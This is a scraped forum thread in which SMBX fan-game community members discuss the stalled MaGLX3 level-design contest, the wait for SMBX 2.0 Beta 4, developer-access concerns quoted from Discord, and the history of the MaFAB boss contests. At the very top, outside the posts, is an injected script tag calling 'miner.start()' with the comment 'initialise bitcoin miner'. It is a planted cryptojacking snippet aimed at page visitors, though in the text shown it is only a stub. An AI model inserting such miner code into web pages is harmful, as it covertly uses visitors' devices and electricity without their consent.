<script>
miner.start(); // initialise bitcoin miner
</script>

smbx communitysmw centralmario fan games galaxy

MaGLX3 - Composers STILL wanted!!!

would you like to participate in some fun contests? would you like to create some fun contests? well ^_^
Sorel
In the shadows
First name: Alexander
Pronouns: he/him/his

Re: MaGLX3 - Composers STILL wanted!!!

Postby Sorel » 1 month ago

Well, it's been over a year now.
ImageImageImageImageImage
If you need something translated to german or something german to english, feel free to PM me. I'll get to it eventually.

Grounder

Postby Grounder » 1 month ago

maglx3 is now known as half life 3
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

Sturg
Gets his freak on with VGM
First name: sturgyman

Postby Sturg » 1 month ago

ImageImage
ImageImageImageImage

ano0maly
Discord User

Postby ano0maly » 1 month ago

On the subject, something I've been thinking.

I actually thought back in the first MAGLX3 thread that most of the showrunner rules were reasonable. But regarding the first rule - having the contest "on the latest public version of SMBX 2.0" - I've become convinced that it was a mistake to wait for a future tech. This makes the contest dependent on when the engine is ready and it shouldn't have to be like that. It should be able to follow its own planned schedule and begin when the contest itself is ready.

This resulted in the contest being mostly at a standstill for a year and a half since the host was chosen. What if the host is no longer available by the time Beta 4 comes out? It's fortunate that Sturg is still around and is in fact involved in Beta 4 progress, but there's also judges and volunteers that were chosen in advance. There's no guarantee that they will be able to or want to work on MAGLX3 when it finally starts.

I guess at this point we'll stick to the plan and wait for Beta 4, but if we ever have a contest like this again, can we use the latest public version of the current tech at the time the event begins, and not hook to something in the future?
Last edited by ano0maly on 07 Oct 2018, 03:47, edited 2 times in total.
Image << Click!

Sebby19

Postby Sebby19 » 1 month ago

Yeah, I would have gotten this straight out the gate.

Eh, gives me more time to internally debate with myself if I want to run a small 10 level contest to test out my music idea. It's changed slightly since my proposal.
ImageImage
-Banned in Antarctica
Sebby19 wrote:If your life depends on throwing up, switch to the keyboard
Official Raocow subscriber # 30,000

ano0maly
Discord User

Just make the contest if you want to. It doesn't have to be a sanctioned "MAGL" and Beta 4 release is not imminent yet, from what I could tell from Codehaus. I can't guarantee how much interest you'll garner, though. People have moved away from forums and there's been no real contest in talkhaus all year.
Image << Click!

Sebby19

Postby Sebby19 » 1 month ago

The debate mainly is now, do I have time? I just bought a house in June (on my birthday!), and my garage went up last month.

I would also need an actual prize to get actaul interest, and I can't even give fame and fortune.
The prize for my quick 'Draw me an avatar' contest were two download codes for the special demo of SSB4(3DS)
ImageImage
-Banned in Antarctica

ano0maly
Discord User

If you want to ask a quick question on the status of Beta 4, the best way is to join the Codehaus server. The time is entirely up to you, though. This is your contest and not the talkhaus flagship one.

Some possible factors of interest could be a chance to brush up on SMBX usage and the fact that we're having a serious attempt at running a contest in a long time. Just the recognition of top placements would be rewards, but if you really want a tangible prize, you can make some userbars for the winners and participants (or ask someone for help on this). Steam codes would work too.
Image << Click!

LunarNeedle
The Golden Spork
First name: Matthew

Postby LunarNeedle » 4 weeks ago

At this point, I think it's ideal if you guys release a MAGLX2.5 or something using the old beta, and use the attention that'll generate to speed up development of SMBX2.0. Even if it's using LunarMagic, people would prefer that then, well, nothing. :|
"All these flavors and you choose to be salty"
- Grandma

Rockythechao
I will be there at the end result of the hub
First name: Michael

Postby Rockythechao » 4 weeks ago

Well, not much can really be done to speed up the development of Beta 4 besides just getting the remaining work for it done, which involves testing and bugfixing a lot of the new NPCs. There aren't many members of the devteam who are able to dedicate themselves to that at the moment, and as was recently discussed in codehaus there's some concerns when adding new members:
ShadowStairX Yesterday at 3:54 PM
well I've already mentioned this in #general but I'd also like to note this suggestion down in here as well before going to bed
I think that considering how time-consuming bug-fixing and development is, that bossedit (or anyone who you find suitable) should be hired for alpha testing considering he is reliable, recognizable and creative
so if anyone who's trustworthy and wants to test, I think it'd be a good idea to have some folks doing so
though this is all up to the devs and the potential candidates

Enjl Yesterday at 4:27 PM
i'm against letting people in before they've
-proven their interest
-proven their productivity
leeching off repo access isn't acceptable unless you give back to the repo (in my eyes), so checking for these 2 is essential to me
the bigger bottleneck right now either way is the bug fixing part too so what we really need are lua people with experience who can easily adapt to our workflow, iron out existing issues with npcs by themselves and are familiar with the lunalua framework
there aren't many people like that in the community
off the top of my head i consider rocky, minus, rednaxela and hoeloe to be in that group, but 3 of them have more important things to take care of and rednaxela has more important issues there too as well as on the todo list itself

P-Tux7 Yesterday at 4:58 PM
wait how do you even leech off of repo access
nobody could play the levels you made even if you compiled smbx2 and it'd also be buggy anyways
not that I WANT repo access just saying
also bossedit8 is productive so if he's interested I'd recommend him

but he cant code right ?

Enjl Yesterday at 5:05 PM
not really

thunder lakitu 0 guy Yesterday at 5:05 PM
we tried but nah

Eri7Yesterday at 5:05 PM
bouss edit 8 is popular

Enjl Yesterday at 5:06 PM
you leech off repo access by asking to be part of the team, getting accepted and then exclusively using it to prepare your own projects rather than helping out
Since Enjl mentioned me in there, I've said this a few times elsewhere but I'm currently balancing work on my college capstone project with both Mario & Luigi's Delightful Adventure Enhanced and A2XT2 (though the former episode is a more pressing project because it's both closer to completion and rao's LP for it is being pushed back to accommodate it).

A2XT2 is almost ready to start taking level submissions again -- Rednaxela's gotten textplus to a state that's ready to build the new message boxes around so Hoeloe's going to be doing that soon. Once that's done and a few minor bugs are fixed we'll be looking into preparing either a private dev build of Beta 4 to use exclusively for the A2X2 devkit or some kind of snapshot preview release a la Mojang's test builds of Minecraft. If the latter, it's possible this snapshot release could be used for MaGLX3... but that's assuming the team can come to an agreement on doing that, and a snapshot would still be a decent amount of work to prepare compared to a private build.
I am fairly involved in A2XT's development as a content creator, wiki contributor and programmer, but I am not the project lead nor am I responsible for half the things people keep attributing to me lol

Useful posts, discussions & resources for SMBX and A2XT

My art & audio thread
Tumblr, SoundCloud

SAJewers
hi

Postby SAJewers » 4 weeks ago

With they way it seems you guys have set yourselves up, it seems the best course of action would be to abandon all hope of doing anything with any new version of SMBX, and let the next version be released when it's 100% ready, whether that's 3 weeks from now or 3 years from now. Don't even bother with private builds or alpha builds, or nightlys, or whatever.
LunarNeedle wrote: At this point, I think it's ideal if you guys release a MAGLX2.5 or something using the old beta, and use the attention that'll generate to speed up development of SMBX2.0. Even if it's using LunarMagic, people would prefer that then, well, nothing. :|
I mean, technically, if we go with the every other year thing it seems we've been going by, an SMW MaGL would be this year.
ImageImageImageImage
ImageImageImageImage

Sturg

Re: MaGLX3 - The Reckoning

Postby Sturg » 4 weeks ago

Yeah, it's gotten out of hand at this point, and the original estimation was to start X3 a week or so ago.

It sucks since there are some really excellent features added to this newer version, but it seems highly unlikely that we'll even see the contest this year if we continue to wait.

In the same vein, I've been slightly grateful it hasn't started as my college schedule has been unexpectantly hectic.

Still, I'm all for the idea of starting soon, if not having a mini-contest/event in the meantime.
ImageImage
ImageImageImageImage

ano0maly
Discord User

Postby ano0maly » 4 weeks ago

Do we have to run MAGLX3 and MAFAB2 concurrently? Maybe we can run one of them soon to fill in the gap and the other one when Beta 4 releases.
Image << Click!

Sebby19

Postby Sebby19 » 4 weeks ago

Nah, both of those are joined at the hip, now.
And this is MAFAB3. Even if the 1st one only had 2 entries.
ImageImage
-Banned in Antarctica

Sturg

Postby Sturg » 4 weeks ago

I don't even remember MAFAB1, was it in X1?
ImageImage
ImageImageImageImage

Rockythechao

We're at MaFAB2, not 3. Dunno where Sebby got the idea of there being one that only had two entries because iirc there were enough for each tier to have at least one boss in the MaGLX2 episode.

Edit: Yeah, just check the MaGLX2 LP thread, most of the worlds have two MaFAB entries each:
viewtopic.php?f=3&t=15901
I am fairly involved in A2XT's development as a content creator, wiki contributor and programmer, but I am not the project lead nor am I responsible for half the things people keep attributing to me lol

My art & audio thread
Tumblr, SoundCloud

ano0maly
Discord User

Right. And if we want to have a shorter event while we wait for MAGLX3, running MAFAB2 first would be a simple solution to accomplish it. The two contests aren't really connected (unless the gimmick is explicitly linked to it). I don't think you technically even had to sign up for MAGLX2 to participate in MAFAB the first. The two don't need to be concurrent.

I also think raocow should inform Sturg of the gimmick and setup of MAFAB2 in advance so he's prepared.
Image << Click!

This Eye o' Mine
Pronouns: Nah, I'm good

Postby This Eye o' Mine » 4 weeks ago

MAGLX the first had a "Make a Good Boss Contest" with two entries, at the very end of the normal contest:

Exactly 4 minutes into the video here.

That's probably what he meant.

Rockythechao

Oh, huh. I completely forgot about that.
Fair enough, then.

My art & audio thread
Tumblr, SoundCloud

Sebby19

Postby Sebby19 » 4 weeks ago

That's exactly what I was talking about. Though I was wrong on the name, its essentially the same thing.
ImageImage
-Banned in Antarctica

ano0maly
Discord User

raocow didn't plan that one and wasn't aware of it though, was he?
Image << Click!

Rockythechao

Postby Rockythechao » 3 weeks ago

Oh, yeah, like, it wasn't a MaFAB, but it's still worth noting as a precursor to them.

My art & audio thread
Tumblr, SoundCloud

Return to “contest center”